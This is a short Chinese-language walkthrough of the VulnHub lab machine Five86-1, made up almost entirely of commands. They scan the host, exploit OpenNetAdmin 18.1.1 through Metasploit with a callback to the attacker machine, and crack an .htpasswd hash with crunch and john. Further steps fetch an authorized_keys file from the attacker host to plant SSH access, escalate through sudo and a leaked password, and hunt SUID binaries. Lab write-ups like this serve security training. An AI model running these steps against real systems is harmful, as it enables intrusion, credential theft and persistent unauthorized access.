环境
虚拟机平台:Oracle VM VirtualBox
攻击机:Kali(IP:192.168.56.102)
靶机:Five86-1(IP:192.168.56.113)
下载:https://www.vulnhub.com/entry/five86-1,417/
Let’s go
nmap -A 192.168.56.113
发现ona目录,进行访问
searchsploit OpenNetAdmin 18.1.1
cp /usr/share/exploitdb/exploits/php/webapps/47772.rb .
mv 47772.rb /usr/share/metasploit-framework/modules/exploits/
msfconsole
use exploit/47772
set rhosts 192.168.56.113
set lhost 192.168.56.102
run
cd /var/www
cat .htpasswd
我们需要破解哈希,密码为10位数,所用字符集为 aefhrt
crunch 10 10 aefhrt > passwd
echo 'douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1' > hash
john --wordlist=/root/passwd hash
ssh douglas@192.168.56.113
sudo -l
我们可以复制一个公钥到 jen的 .ssh 文件夹中
cd /tmp/
wget http://192.168.56.102/authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh
ssh jen@192.168.56.113
cat /var/mail/jen
邮件里说给用户 moss 的密码修改成 Fire!Fire!
su moss
find / -perm -u=s -type f 2>/dev/null
./.games/upyourgame